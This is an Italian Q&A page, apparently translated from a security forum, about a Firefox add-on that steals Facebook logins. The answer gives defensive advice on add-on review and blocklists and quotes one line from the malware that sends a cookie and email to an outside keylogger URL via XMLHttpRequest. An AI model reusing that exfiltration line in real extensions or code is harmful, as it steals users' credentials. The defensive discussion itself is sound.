Come utilizzare in modo sicuro il componente aggiuntivo di Firefox per evitare di rubare i dati?

Question

Come utilizzare in modo sicuro il componente aggiuntivo di Firefox per evitare di rubare i dati?

#1 da (4 voti)

0

Alcuni video su YouTube dimostrano come un'estensione di Firefox può raccogliere informazioni di accesso utilizzate per accedere a siti Web come Facebook.

Dopo aver installato questo strumento / malware come componente aggiuntivo di Firefox, ho osservato l'attività del mio browser usando Firebug. Il mio nome utente e password sono stati inviati a un server tramite richiesta Ajax.

Ho contattato l'autore. Ha detto che può incorporare questo script in qualsiasi componente aggiuntivo di Firefox.

Come posso utilizzare in sicurezza i componenti aggiuntivi di Firefox? Ho installato 3 tipi di antivirus e firewall. Ma nessuno di questi è stato in grado di rilevare questo malware.

web-browser firefox malware spyware browser-extensions

posta ebola virus 04.08.2012 - 10:02

fonte

1 risposta



                    
                Leggi altre domande sui tag
                                            web-browser
                                            firefox
                                            malware
                                            spyware
                                            browser-extensions
                                    
            
        

         
                            L'output OpenSSL Base64 ha una lunghezza errata
                                        Suspicious .exe impostato per essere eseguito all'avvio: Determina se il file esiste ancora

score 4 · Accepted Answer

Come ti proteggi

Gli addon di Firefox dal sito ufficiale vengono sottoposti al processo di revisione dei componenti aggiuntivi link

Quindi puoi verificare se un addon è ufficiale ed è stato revisionato prima dell'installazione.

Non è al 100% È possibile trovare un elenco di componenti aggiuntivi bloccati rimosso da Mozilla a causa di determinati motivi (virus, trojan, ecc.) link

Installare un addon da una terza parte è più pericoloso, quindi potresti aver bisogno di controllare personalmente il codice sorgente (che è possibile dato che si tratta di un file zip di file javascript) o fidarti dell'autore / fornitore.

Come funziona il malware?

Il file .xul contiene la seguente riga di codice:

xhr.open("GET", 
      "http://www.removedurl.com/keylogger/snooper.php?
       facebook="+cookie+'&email='+email, true);



 Quindi quando testi questo script sul tuo account, gli invierà la tua password. Per questo motivo dovresti eliminare questo add-on e cambiare la tua password.